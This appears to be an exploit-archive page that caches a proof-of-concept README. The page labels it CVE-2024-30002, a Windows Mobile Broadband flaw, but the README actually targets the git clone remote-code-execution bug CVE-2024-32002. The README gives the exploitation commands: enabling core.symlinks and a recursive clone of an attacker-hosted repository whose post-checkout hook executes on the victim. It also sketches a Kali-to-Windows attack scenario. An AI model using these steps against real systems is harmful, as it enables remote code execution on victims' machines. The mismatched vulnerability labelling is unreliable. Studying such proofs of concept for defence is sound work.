Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-30002 PoC — Microsoft Windows Mobile Broadband 输入验证错误漏洞

Source
Associated Vulnerability
Title:Microsoft Windows Mobile Broadband 输入验证错误漏洞 (CVE-2024-30002)
Description:Microsoft Windows是美国微软(Microsoft)公司的一套个人设备使用的操作系统。 Microsoft Windows Mobile Broadband存在输入验证错误漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Se
Description
git clone rce CVE-2024-30002
Readme
# CVE-2024-32002 PoC
1. You must set up the git's symbolic link option like:
```
git config --global core.symlinks true
```

2. Then exploit CVE-2024-32002 by the following command:
```
git clone --recursive https://github.com/EQSTSeminar/git_rce.git
```

# Attack Scenario
kali(192.168.216.129) --Give remote repository address--> Win(192.168.216.130)

kali(192.168.216.129) <--Git clone && hook script(post-checkout) execution-- Win(192.168.216.130)

# Disclaimer
This repository is not intended to be git clone RCE exploit to CVE-2024-32002. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.
File Snapshot

[4.0K] /data/pocs/b149744017236d3b5e7bc9f2758bccda8ad17426 ├── [ 4] a -> .git ├── [4.0K] A │   └── [4.0K] modules │   └── [4.0K] x └── [ 664] README.md 4 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.